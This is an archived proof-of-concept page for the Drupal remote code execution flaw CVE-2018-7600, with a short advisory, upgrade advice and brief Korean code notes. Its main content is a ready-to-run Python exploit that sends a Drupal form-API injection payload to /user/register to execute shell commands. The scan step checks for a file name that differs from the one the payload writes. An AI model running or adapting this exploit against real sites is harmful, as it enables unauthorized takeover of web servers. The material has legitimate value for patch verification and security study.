Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-7600 PoC — Drupal 安全漏洞

Source
https://github.com/mr-won/CVE-2018-7600.
Associated Vulnerability
Title:Drupal 安全漏洞 (CVE-2018-7600)
Description:Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Description
CVE-2018-7600.
Readme
## IGLOO Corp, Won Chi Hyun Drupal RCE 분석 보고서

Drupal RCE CVE-2018-7600

Dont Forget to Put Your Adress into the Script !
Description:
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.

Solution:
Upgrade to the most recent version of Drupal 7 or 8 core.

If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.) If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)

```python
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL                                            |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > RETURN_ROOT@PROTONMAIL.COM                                   | |
|GITHUB > https://github.com/r3dxpl0it                                | |
|WEB-PAGE > https://r3dxpl0it.Github.io                               |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests

def exploit(target):
    pass
    proxies = {}
    verify = False

    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    print ( '[*]' + ' requesting post')
    r = requests.post(url, proxies=proxies, data=payload, verify=verify)
    try:
        scan = requests.get(target + 'vulnerable.txt')
        if scan.status_code != 200:
           print ( ' not vulnerable to cve-2018-7600 exploit \n')
        if scan.status_code == 200:
           print (' vulnerable to cve-2018-7600 exploit')
           print (' url: ' + target + 'vulnerable.txt \n')
    except requests.ConnectionError:
        print (' target connection timeout')
    except Exception as e :
        print ('Connction Failed ' + e )
				

if __name__ == '__main__':
   exploit(sys.argv[1])
```
코드분석.

main -> exploit

argv[1] -target argument
scan. status_code 코드 상태값에 따라서 결과값 도출
이벤트 예외처리
File Snapshot

 [4.0K]  /data/pocs/d46fee04dfecb5a6135df0119c24759ebebd09f0
└── [2.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →